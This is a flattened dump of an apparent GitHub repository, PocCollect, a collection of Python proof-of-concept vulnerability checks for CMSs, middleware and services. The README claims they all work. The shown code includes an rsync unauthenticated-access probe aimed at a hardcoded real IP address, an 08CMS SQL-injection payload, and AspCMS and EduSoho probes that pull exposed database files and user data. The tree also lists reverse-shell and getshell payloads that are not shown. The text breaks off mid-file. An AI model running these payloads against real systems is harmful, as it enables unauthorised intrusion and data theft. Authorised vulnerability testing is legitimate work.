├── .gitignore ├── .idea ├── PocCollect.iml ├── misc.xml ├── modules.xml ├── vcs.xml └── workspace.xml ├── LICENSE ├── README.md ├── application ├── __init__.py ├── rsync │ ├── __init__.py │ ├── rsync_auth.py │ └── t.py └── t.py ├── bugscan_to_poccollect.py ├── cms ├── 08cms │ ├── 08cms_1d42d5fc5efdd2ecbf8157a1bf1ac292.py │ └── __init__.py ├── __init__.py ├── aspcms │ ├── __init__.py │ └── aspcms_13218a43f832e58d66688ed73e123044.py ├── edusohocms │ ├── __init__.py │ └── edusohocms_3d644fd5efb2fc076e04a786e1190083.py ├── huaficms │ ├── __init__.py │ └── huaficms_c8eb9652690ea8366b0f4852d5aeaead.py ├── miniCurl.py ├── phpcms │ ├── __init__.py │ ├── phpcms_v9_6.py │ └── t.py ├── sdcms │ ├── __init__.py │ └── sdcms_3114b79e6d650cbdbaf0e8f592f884ad.py └── t.py ├── component ├── JDWP │ ├── JDWPvul.py │ ├── __init__.py │ ├── script │ │ └── jdwpshellifier.py │ └── t.py ├── __init__.py ├── bash │ ├── __init__.py │ ├── bash.py │ └── t.py ├── cacti │ ├── __init__.py │ ├── cactifiledisclosure.py │ ├── cactiweathermap.py │ └── t.py ├── docker │ ├── __init__.py │ ├── dockerleak.py │ ├── script │ │ └── docker_unauth.py │ └── t.py ├── elasticsearch │ ├── __init__.py │ ├── elasticsearch_groovy.py │ ├── elasticsearch_nodestate.py │ └── t.py ├── fast_cgi │ ├── __init__.py │ ├── fast_cgi.py │ └── t.py ├── joomla │ ├── __init__.py │ ├── joomla_unrec.py │ └── t.py ├── openssl │ ├── __init__.py │ ├── heartbleed.py │ ├── script │ │ └── heartbleedpoc.py │ └── t.py ├── redis │ ├── __init__.py │ ├── redis_unauth.py │ └── t.py ├── smb │ ├── __init__.py │ ├── ms17_010.py │ └── t.py ├── struts │ ├── __init__.py │ ├── script │ │ ├── __init__.py │ │ └── linktool.py │ ├── struts032test.py │ ├── struts045.py │ ├── struts2016.py │ ├── struts2019.py │ ├── struts2032.py │ ├── struts2046.py │ ├── struts2devmode.py │ └── t.py ├── t.py ├── test │ └── __init__.py └── zebra │ ├── __init__.py │ ├── a.out │ ├── t.py │ └── zebradefaultpass.py ├── database ├── __init__.py ├── mongo │ ├── __init__.py │ ├── 
mongo_auth.py │ └── t.py ├── postgresql │ ├── __init__.py │ └── postgresql_3c99590b8794b5c7ed0693e732916e92.py └── t.py └── middileware ├── __init__.py ├── apache ├── __init__.py ├── apache_state.py └── t.py ├── axis ├── __init__.py ├── axis_config_read.py ├── axis_crackpass.py ├── axis_info.py └── t.py ├── glassfish ├── __init__.py ├── glassfish_crackpass.py ├── glassfish_fileread.py └── t.py ├── iis ├── __init__.py ├── iis6.0_cve-2017-7269.py ├── iis_shortname.py ├── ms15_034.py └── t.py ├── jboss ├── __init__.py ├── jboss_crackpass.py ├── jboss_head_getshell.py ├── jboss_info.py ├── jboss_unrce.py ├── shell.jsp ├── t.py ├── upload.jar └── vultest.dat ├── resin ├── __init__.py ├── resin_crackpass.py ├── resin_fileread.py ├── resin_fileread2.py ├── resin_fileread3.py ├── resin_fileread4.py └── t.py ├── t.py ├── tomcat ├── __init__.py ├── t.py └── tomcat_crackpass.py ├── weblogic ├── __init__.py ├── collections_3.2.0.jar ├── javax.jar ├── payload_bin │ ├── inst.jar │ ├── nc.exe │ ├── payload_Linux_delete.bin │ ├── payload_Linux_inst.bin │ ├── payload_Linux_reverse.bin │ ├── payload_Linux_uninst.bin │ ├── payload_Linux_upload_inst.bin │ ├── payload_Linux_upload_reverse.bin │ ├── payload_Linux_upload_uninst.bin │ ├── payload_Windows_delete.bin │ ├── payload_Windows_inst.bin │ ├── payload_Windows_reverse.bin │ ├── payload_Windows_uninst.bin │ ├── payload_Windows_upload_inst.bin │ ├── payload_Windows_upload_reverse.bin │ ├── payload_Windows_upload_uninst.bin │ ├── reverse.jar │ ├── reverse_shell.py │ └── uninst.jar ├── shellApp.jar ├── t.py ├── weblogic.jar ├── weblogic_crackpass.py └── weblogic_unrec.py └── zabbix ├── __init__.py ├── t.py ├── zabbix_sqlhack.py ├── zabbix_sqli_v2-3.03.py └── zabbix_weakpass.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 
11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask stuff: 57 | instance/ 58 | .webassets-cache 59 | 60 | # Scrapy stuff: 61 | .scrapy 62 | 63 | # Sphinx documentation 64 | docs/_build/ 65 | 66 | # PyBuilder 67 | target/ 68 | 69 | # IPython Notebook 70 | .ipynb_checkpoints 71 | 72 | # pyenv 73 | .python-version 74 | 75 | # celery beat schedule file 76 | celerybeat-schedule 77 | 78 | # dotenv 79 | .env 80 | 81 | # virtualenv 82 | venv/ 83 | ENV/ 84 | 85 | # Spyder project settings 86 | .spyderproject 87 | 88 | # Rope project settings 89 | .ropeproject 90 | -------------------------------------------------------------------------------- /.idea/PocCollect.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 11 | -------------------------------------------------------------------------------- /.idea/misc.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /.idea/modules.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 
-------------------------------------------------------------------------------- /.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 sherwel 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PocCollect 2 | 3 | [![Build Status](http://nanshihui.github.io/public/status.svg)](http://nanshihui.github.io/2016/01/21/ToolForSpider%E7%AE%80%E4%BB%8B/) [![Python 2.6|2.7](http://nanshihui.github.io/public/python.svg)](https://www.python.org/) [![License](http://nanshihui.github.io/public/license.svg)](http://nanshihui.github.io/2016/01/21/ToolForSpider%E7%AE%80%E4%BB%8B/) 4 | 5 |   PocCollect contains plenty of POCs based on Python; all the POCs come from the internet, were retested by myself, and they do work. 6 | 7 |   The POCs inside cover common vulnerabilities, including Struts2, Heartbleed, Java Deserialization and so on. 8 | 9 | 10 | 11 | Installation 12 | ---- 13 | 14 | You can download PocCollect by cloning the [Git](https://github.com/nanshihui/PocCollect) repository: 15 | 16 | git clone https://github.com/nanshihui/PocCollect.git 17 | 18 | PocCollect works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform. 19 | 20 | Notice 21 | ---- 22 | The POCs inside are only for learning purposes. Do not use them for other illegal purposes.
23 | -------------------------------------------------------------------------------- /application/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/application/__init__.py -------------------------------------------------------------------------------- /application/rsync/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['rsync', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if int(port) in [873] or productname.get('protocol','') in ['rsync']: 6 | return True 7 | else: 8 | 9 | return False -------------------------------------------------------------------------------- /application/rsync/rsync_auth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | from t import T 4 | 5 | import socket 6 | 7 | import time 8 | 9 | 10 | class P(T): 11 | def __init__(self): 12 | T.__init__(self) 13 | 14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 15 | 16 | result = {} 17 | result['result']=False 18 | s=None 19 | 20 | 21 | try: 22 | 23 | payload = '\x40\x52\x53\x59\x4e\x43\x44\x3a\x20\x33\x31\x2e\x30\x0a' 24 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 25 | socket.setdefaulttimeout(10) 26 | 27 | 28 | s.connect((ip, int(port))) 29 | s.sendall(payload) 30 | time.sleep(2) 31 | # server init. 
32 | initinfo = s.recv(400) 33 | if "RSYNCD" in initinfo: 34 | s.sendall("\x0a") 35 | time.sleep(2) 36 | modulelist = s.recv(200) 37 | 38 | if len(modulelist) > 0: 39 | 40 | 41 | result['result'] = True 42 | result['VerifyInfo'] = {} 43 | result['VerifyInfo']['type'] = 'rsync unauth access vul' 44 | result['VerifyInfo']['URL'] = ip 45 | result['VerifyInfo']['Port'] = port 46 | 47 | result['VerifyInfo']['result'] = str(modulelist) 48 | 49 | 50 | except Exception,e: 51 | print e.text 52 | finally: 53 | if s is not None: 54 | s.close() 55 | return result 56 | if __name__ == '__main__': 57 | # print P().verify(ip='61.146.115.83',port='81') 58 | print P().verify(ip='118.244.21.121', port='873') 59 | -------------------------------------------------------------------------------- /application/rsync/t.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 15 | ## 16 | #head 返回的请求头 17 | #context 返回请求正文html代码 18 | #ip 请求ip 19 | #port 请求端口 20 | #productname 请求的组件产品 21 | #keywords 暂时已知的关键词组件 22 | #hackinfo 备用字段 23 | 24 | 25 | 26 | 27 | return True 28 | 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /application/t.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | 5 | class T(object): 6 | def __init__(self): 7 | 8 | self.result = { 9 | 'type': None, 10 | 'version': None, 11 | } 12 | self.keywords = [] 13 | self.versions = [] 14 | 15 | def match_rule(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo='', **kw): 16 | ## 17 | #head 返回的请求头 18 | #context 返回请求正文html代码 19 | #ip 请求ip 20 | #port 请求端口 21 | #productname 请求的组件产品 22 | #keywords 暂时已知的关键词组件 23 | #hackinfo 备用字段 24 | 25 | 26 | 27 | 28 | return True 29 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 30 | result = {} 31 | result['result']=False 32 | return result 33 | def attack(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 34 | result = {} 35 | result['result']=False 36 | return result 37 | def parse_output(self, result): 38 | result = {} 39 | result['result']=False 40 | return result -------------------------------------------------------------------------------- /bugscan_to_poccollect.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os ,random,re 3 | import logger 4 | logge = logger.initLog("log.log", 2, True,'a') 5 | def readpath(path): 6 | rootpath=path 7 | files = os.listdir(path) 8 | for i in xrange(len(files)): 9 | files[i]=rootpath+'/'+files[i] 10 | return files 11 | def locatecode(path,targetpath): 12 | sourcepath=path 13 | with open(path,'r') as fileitem: 14 | content = fileitem.readlines() 15 | func_assign_line=0 16 | func_audit_line=0 17 | func_main_line=0 18 | func_targetfile=None 19 | func_def_line=0 20 | params=None 21 | service=None 22 | def_line=[] 23 | targetpath=targetpath 24 | security_label=None 25 | targetfilepath=None 26 | for line in xrange(len(content)): 27 | 28 | if 'curl' in content[line] and line4: 41 | error(' may fail,multi params 
',sourcepath,targetfilepath) 42 | func_audit_line=line 43 | 44 | # writecontent(targetfilepath,content,line,len(content)-1,params,'') 45 | 46 | if '__name__' in content[line]: 47 | func_main_line=line 48 | def_line.append(line) 49 | if 'if ' in content[line] and ' service' in content[line]: 50 | prefix=content[line].find('"') 51 | suffix=content[line].rfind('"') 52 | service=content[line][prefix+1:suffix] 53 | if 'if service' in service: 54 | prefix=content[line].find('\'') 55 | suffix=content[line].rfind('\'') 56 | service=content[line][prefix+1:suffix] 57 | index=targetpath+'/'+service 58 | isexit=os.path.exists(index) 59 | if not isexit: 60 | os.mkdir(index) 61 | initfile=index+'/__init__.py' 62 | 63 | isexit=os.path.exists(initfile) 64 | if not isexit: 65 | os.mknod(initfile) 66 | write__init__(initfile,service) 67 | targetfilepath=index+'/'+service+'_'+md5(path)+'.py' 68 | func_targetfile=targetfilepath 69 | if func_audit_line!=0 : 70 | match = re.search(r'security_\w+', content[line]) 71 | if match: 72 | item=match.group(0) 73 | security_label=item 74 | suffix_params=content[line].rfind(')') 75 | labeltype=security_label.split('_')[1] 76 | content[line]=content[line][0:suffix_params]+',result,\''+labeltype+'\')\n' 77 | content[line]=content[line].replace(item,'output') 78 | if line>func_main_line: 79 | url='' 80 | if 'audit(assign' in content[line]: 81 | match=re.search(r'((http|ftp|https)://)(([a-zA-Z0-9\._-]+\.[a-zA-Z]{2,6})|([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}))(:[0-9]{1,4})*(/[a-zA-Z0-9\&%_\./-~-]*)?',"""audit(assign('www','http://yunlai.cn:803/sfdsfds/')[1])""") 82 | if match: 83 | url=match.group(0) 84 | else: 85 | error(' may fail, no url ',sourcepath,targetfilepath) 86 | match = re.search(r'\w+',content[line]) 87 | if match: 88 | 89 | t= match.group(0) 90 | 91 | index=content[line].find(t) 92 | msg=' '*index+"""print P().verify(ip='%s',port='80')\n"""%url 93 | content[line]=msg 94 | else: 95 | error(' may fail, no url 
word',sourcepath,targetfilepath) 96 | if 'from dummy import *' in content[line]: 97 | content[line]='' 98 | # writecontent(targetfilepath,array,0,0) 99 | if func_assign_line==0: 100 | 101 | error(' may fail, no assign func',sourcepath,targetfilepath) 102 | path={} 103 | path['sourcepath']=sourcepath 104 | path['func_assign_line']=func_assign_line 105 | path['func_audit_line']=func_audit_line 106 | path['func_main_line']=func_main_line 107 | path['func_targetfile']=func_targetfile 108 | path['func_def_line']=func_def_line 109 | path['security_label']=security_label 110 | path['targetfilepath']=targetfilepath 111 | path['def_line']=def_line 112 | if security_label is None: 113 | error(' may fail, no security_label',sourcepath,targetfilepath) 114 | # path['func_warn_line']=func_warn_line 115 | # path['func_info_line']=func_info_line 116 | # path['func_notice_line']=func_notice_line 117 | path['params']=params 118 | path['service']=service 119 | if func_def_line!=func_assign_line: 120 | error(' may fail, have other func',sourcepath,targetfilepath) 121 | 122 | return path,content 123 | def error(msg,pathsrc,pathadd): 124 | global logge 125 | logge.info("info %s %s %s", "may fail, "+msg,pathsrc,pathadd) 126 | def reform(path,targetpath): 127 | path_line,content=locatecode(path,targetpath) 128 | targetfilepath=path_line.get('func_targetfile',None) 129 | func_assign_line=path_line.get('func_assign_line',0) 130 | func_audit_line=path_line.get('func_audit_line',0) 131 | func_main_line=path_line.get('func_main_line',0) 132 | security_label=path_line.get('security_label','') 133 | sourcepath=path_line.get('sourcepath','') 134 | params=path_line.get('params','') 135 | def_line=path_line.get('def_line',[]) 136 | 137 | deflist={} 138 | if targetfilepath: 139 | import_file(targetfilepath) 140 | writeprefix(targetfilepath,content,0,def_line[0]-1,'a') 141 | for i in xrange(len(def_line)): 142 | 143 | if def_line[i]!=func_audit_line and def_line[i]!=func_main_line and 
def_line[i]!=func_assign_line: 144 | 145 | 146 | writeprefix(targetfilepath,content,def_line[i],def_line[i+1]-1,'a') 147 | if def_line[i]==func_audit_line: 148 | deflist['func_audit_line']=i 149 | 150 | elif def_line[i]==func_main_line: 151 | deflist['func_main_line']=i 152 | elif def_line[i]==func_assign_line: 153 | deflist['func_assign_line']=i 154 | 155 | writeclass(targetfilepath,type='a',service=params) 156 | print targetfilepath,sourcepath 157 | print deflist 158 | print def_line 159 | if deflist['func_audit_line']+1==len(deflist): 160 | writeprefix(targetfilepath,content,func_audit_line+1,len(content),'a',default=' ') 161 | 162 | else: 163 | writeprefix(targetfilepath,content,func_audit_line+1,def_line[deflist['func_audit_line']+1]-1,'a',default=' ') 164 | 165 | writereturn(targetfilepath,type='a') 166 | writeoutput(targetfilepath,'a',path_line) 167 | 168 | 169 | 170 | if deflist['func_audit_line']+1==len(deflist): 171 | pass 172 | 173 | else: 174 | writeprefix(targetfilepath,content,func_main_line,len(content),'a') 175 | 176 | 177 | 178 | 179 | contents="""\n#%s\n#%s"""%(targetfilepath,sourcepath) 180 | writecontent(targetfilepath,contents) 181 | 182 | 183 | def writeoutput(targetpath='',type='a',vulinfo={}): 184 | service=vulinfo.get('service','') 185 | security_label=vulinfo.get('security_label','') 186 | targetfilepath=vulinfo.get('func_targetfile',None) 187 | 188 | content=""" 189 | 190 | def output(url,result,label): 191 | info = url + ' %s Vul ' 192 | result['result']=True 193 | result['VerifyInfo'] = {} 194 | result['VerifyInfo']['type']='%s Vul' 195 | result['VerifyInfo']['URL'] =url 196 | result['VerifyInfo']['payload']='%s' 197 | result['VerifyInfo']['level']=label 198 | result['VerifyInfo']['result'] =info 199 | 200 | """%(service,service,targetfilepath) 201 | writecontent(targetpath,content) 202 | 203 | 204 | def writereturn(targetpath,type='a'): 205 | content=""" 206 | del curl 207 | return result 208 | """ 209 | 
writecontent(targetpath,content) 210 | def writeclass(targetpath,type='w',service=''): 211 | content=""" 212 | class P(T): 213 | def __init__(self): 214 | T.__init__(self) 215 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 216 | %s='http://'+ip+':'+port+'/' 217 | curl=Curl() 218 | result = {} 219 | result['result']=False 220 | 221 | """%service 222 | writecontent(targetpath,content,type) 223 | 224 | def import_file(targetpath,type='w'): 225 | 226 | content="""from ..miniCurl import Curl 227 | from ..t import T 228 | """ 229 | writecontent(targetpath,content,type) 230 | 231 | def writeprefix(filepath,array,start,end,type,default=''): 232 | filebind = open(filepath, type) 233 | while end>start or end==start: 234 | if start==len(array) or start >len(array): 235 | break 236 | item=default+array[start] 237 | filebind.write(item) 238 | start=start+1 239 | filebind.close() 240 | def writecontent(filepath,content,type='a'): 241 | filebind = open(filepath, type) 242 | filebind.write(content) 243 | filebind.close() 244 | def write__init__(path,service): 245 | content="""KEYWORDS = ['%s', ] 246 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 247 | 248 | 249 | if '%s' in context or '%s' in head: 250 | return True 251 | else: 252 | return False""" %(service,service,service) 253 | 254 | targetfile=open(path,'w') 255 | targetfile.write(content) 256 | targetfile.close() 257 | def md5(str): 258 | import hashlib 259 | import types 260 | if type(str) is types.StringType: 261 | m = hashlib.md5() 262 | m.update(str) 263 | return m.hexdigest() 264 | else: 265 | return '' 266 | 267 | 268 | if __name__ == "__main__": 269 | 270 | path=readpath(os.path.split(os.path.realpath(__file__))[0]+'/codesrc') 271 | 272 | for i in path: 273 | reform(i,'/root/github/poccreate/thirdparty') 274 | 275 | # reform('/root/github/poccreate/codesrc/exp-133.py','/root/github/poccreate/thirdparty') 276 | 277 | 278 | 
-------------------------------------------------------------------------------- /cms/08cms/08cms_1d42d5fc5efdd2ecbf8157a1bf1ac292.py: --------------------------------------------------------------------------------
#/usr/bin/python
#-*- coding: utf-8 -*-
#Refer http://www.wooyun.org/bugs/wooyun-2015-0110861
#__Author__ = 上善若水
#_PlugName_ = 08CMS_sql Plugin
#_FileName_ = 08CMS_sql.py
# Converter-generated plugin: the two trailer comments at the end of the file
# name the generator's output path and the source script it was built from.
from ..miniCurl import Curl
from ..t import T


class P(T):
    """08CMS SQL-injection check (see the WooYun reference above).

    Follows the plugin contract of ``T``: ``verify`` returns a dict whose
    ``result`` key is False unless the response carries the injected marker.
    """
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Send one GET to ``http://ip:port/info.php`` and report whether the
        hex value the injected ``md5(520)`` is expected to produce comes back
        in the response body.

        Only ``ip`` and ``port`` are used; the other parameters belong to the
        shared ``T`` signature and are ignored here.  ``productname={}`` is a
        mutable default inherited from that signature and is never mutated.

        Returns:
            dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` as
            filled in by ``output``.

        Errors raised by ``curl.curl2`` are not caught here; what curl2 does
        on a network failure is not visible in this file.
        """
        # ip is expected to be a bare host: the URL is built by plain string
        # concatenation, so passing a full URL as ip yields "http://http://..."
        # (the __main__ block below does exactly that).
        arg='http://'+ip+':'+port+'/'
        curl=Curl()
        result = {}
        result['result']=False

        # The clean request URL and the injected suffix are kept apart so that
        # only the clean URL is reported on a hit.
        url = arg + "info.php?fid=1&tblprefix=cms_msession"
        payload = "/**/where/**/1/**/and/**/updatexml(1,concat(0x37,(select/**/md5(520)/**/limit/**/0,1)),1)%23"
        geturl = url + payload
        # The whole probe is a single GET carrying a fixed cookie value, so it
        # appears in the target's access log as a request to info.php whose
        # query string contains "updatexml(" — the thing a WAF/log rule would
        # key on.
        code, head, body, errcode, final_url = curl.curl2(geturl,cookie="umW_msid=rsLQWU")
        if code == 200 and 'cf67355a3333e6e143439161adc2d82e' in body:
            output(url,result,'hole')


        del curl
        return result


def output(url,result,label):
    """Mark ``result`` as positive in place and attach the VerifyInfo record.

    Args:
        url: the clean request URL (without the injected suffix).
        result: the dict built by ``verify``; mutated, not returned.
        label: severity label stored under ``VerifyInfo['level']``.

    NOTE(review): ``payload`` holds the converter's output path on the
    author's machine, not the request that was sent — it matches the first
    trailer comment at the end of the file, so it looks like a generator
    artifact.
    """
    info = url + ' 08cms Vul '
    result['result']=True
    result['VerifyInfo'] = {}
    result['VerifyInfo']['type']='08cms Vul'
    result['VerifyInfo']['URL'] =url
    result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/08cms/08cms_1d42d5fc5efdd2ecbf8157a1bf1ac292.py'
    result['VerifyInfo']['level']=label
    result['VerifyInfo']['result'] =info

if __name__ == '__main__':
    # NOTE(review): a full URL is passed as ip, which verify() wraps in
    # "http://" + ... + ":80/" again; the value looks like a converter
    # placeholder rather than a usable target.
    print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80')

#/root/github/poccreate/thirdparty/08cms/08cms_1d42d5fc5efdd2ecbf8157a1bf1ac292.py
#/root/github/poccreate/codesrc/exp-885.py
-------------------------------------------------------------------------------- /cms/08cms/__init__.py:
-------------------------------------------------------------------------------- 1 | KEYWORDS = ['08cms', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if '08cms' in context or '08cms' in head: 6 | return True 7 | else: 8 | return False -------------------------------------------------------------------------------- /cms/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nanshihui/PocCollect/e13e137901bc91ae44465a1c9d88a9961dbab6bf/cms/__init__.py -------------------------------------------------------------------------------- /cms/aspcms/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['aspcms', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if 'aspcms' in context or 'aspcms' in head: 6 | return True 7 | else: 8 | return False -------------------------------------------------------------------------------- /cms/aspcms/aspcms_13218a43f832e58d66688ed73e123044.py: -------------------------------------------------------------------------------- 1 | from ..miniCurl import Curl 2 | from ..t import T 3 | #! 
/usr/bin/env python 4 | # -*- coding: utf-8 -*- 5 | #author: oneroy@qq.com 6 | #refer: http://www.wooyun.org/bugs/wooyun-2010-060483 7 | 8 | import re 9 | 10 | 11 | class P(T): 12 | def __init__(self): 13 | T.__init__(self) 14 | def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 15 | arg='http://'+ip+':'+port+'/' 16 | curl=Curl() 17 | result = {} 18 | result['result']=False 19 | 20 | payloads=["data/%23aspcms252.asp","data/%23data.asp"] 21 | for payload in payloads: 22 | url = arg + payload 23 | code, head, res, errcode,_ = curl.curl2(url) 24 | if (code==200 or code==500) and "Standard Jet DB" in res: 25 | output(url,result,'info') 26 | 27 | 28 | del curl 29 | return result 30 | 31 | 32 | def output(url,result,label): 33 | info = url + ' aspcms Vul ' 34 | result['result']=True 35 | result['VerifyInfo'] = {} 36 | result['VerifyInfo']['type']='aspcms Vul' 37 | result['VerifyInfo']['URL'] =url 38 | result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/aspcms/aspcms_13218a43f832e58d66688ed73e123044.py' 39 | result['VerifyInfo']['level']=label 40 | result['VerifyInfo']['result'] =info 41 | 42 | if __name__ == '__main__': 43 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80') 44 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80') 45 | print P().verify(ip='http://yunlai.cn:803/sfdsfds/',port='80') 46 | 47 | #/root/github/poccreate/thirdparty/aspcms/aspcms_13218a43f832e58d66688ed73e123044.py 48 | #/root/github/poccreate/codesrc/exp-1769.py -------------------------------------------------------------------------------- /cms/edusohocms/__init__.py: -------------------------------------------------------------------------------- 1 | KEYWORDS = ['edusohocms', ] 2 | def rules(head='',context='',ip='',port='',productname={},keywords='',hackinfo=''): 3 | 4 | 5 | if 'edusohocms' in context or 'edusohocms' in head: 6 | return True 7 | else: 8 | return False 
-------------------------------------------------------------------------------- /cms/edusohocms/edusohocms_3d644fd5efb2fc076e04a786e1190083.py: --------------------------------------------------------------------------------
from ..miniCurl import Curl
from ..t import T
#!/usr/bin/env python
#coding:utf-8
# The two lines above sit after the imports because the converter writes the
# import header first; a coding declaration only takes effect on line 1 or 2,
# so it is inert here, and the shebang is just a comment.


class P(T):
    """EduSoho API check: looks for HTTP 500 responses from two API
    endpoints whose bodies contain the marker strings tested in ``verify``.

    Follows the plugin contract of ``T``: ``verify`` returns a dict whose
    ``result`` key is False unless one of the probes matches.
    """
    def __init__(self):
        T.__init__(self)
    def verify(self,head='',context='',ip='',port='',productname={},keywords='',hackinfo=''):
        """Fetch two ``api/users/1/...`` endpoints and report a hit when the
        status is 500 and the body contains a marker string.

        Only ``ip`` and ``port`` are used; the remaining parameters belong to
        the shared ``T`` signature and are ignored (``productname={}`` is a
        mutable default from that signature and is not mutated here).

        Returns:
            dict with ``result`` (bool) and, on a hit, ``VerifyInfo`` as
            filled in by ``output``.

        NOTE(review): ``code`` is overwritten by the second request and both
        ``if`` tests read ``res1``; ``res2`` is assigned but never inspected,
        so the second condition re-tests the first response.  Errors raised by
        ``curl.curl2`` are not caught; its failure behaviour is not visible in
        this file.
        """
        # ip is expected to be a bare host; a full URL (as in __main__ below)
        # produces "http://http://...".
        arg='http://'+ip+':'+port+'/'
        curl=Curl()
        result = {}
        result['result']=False

        # Both probes are plain GETs, so they show up in the target's access
        # log as requests to api/users/1/followings and
        # api/users/1/friendship?toIds[]=a.
        poc1 = arg+'api/users/1/followings'
        poc2 = arg+'api/users/1/friendship?toIds[]=a'
        code, head, res1, errcode, _ = curl.curl2(poc1)
        code, head, res2, errcode, _ = curl.curl2(poc2)
        if code == 500 and "loginSessionId" in res1:
            output("edusoho vulnerable:"+poc1,result,'hole')
        if code == 500 and "'password' => '" in res1:
            output("edusoho vulnerable:"+poc2,result,'hole')


        del curl
        return result


def output(url,result,label):
    """Mark ``result`` as positive in place and attach the VerifyInfo record.

    Args:
        url: here an "edusoho vulnerable:<url>" string built by ``verify``.
        result: the dict built by ``verify``; mutated, not returned.
        label: severity label stored under ``VerifyInfo['level']``.

    NOTE(review): ``payload`` holds the converter's output path on the
    author's machine, not the request that was sent (it matches the first
    trailer comment at the end of the file).
    """
    info = url + ' edusohocms Vul '
    result['result']=True
    result['VerifyInfo'] = {}
    result['VerifyInfo']['type']='edusohocms Vul'
    result['VerifyInfo']['URL'] =url
    result['VerifyInfo']['payload']='/root/github/poccreate/thirdparty/edusohocms/edusohocms_3d644fd5efb2fc076e04a786e1190083.py'
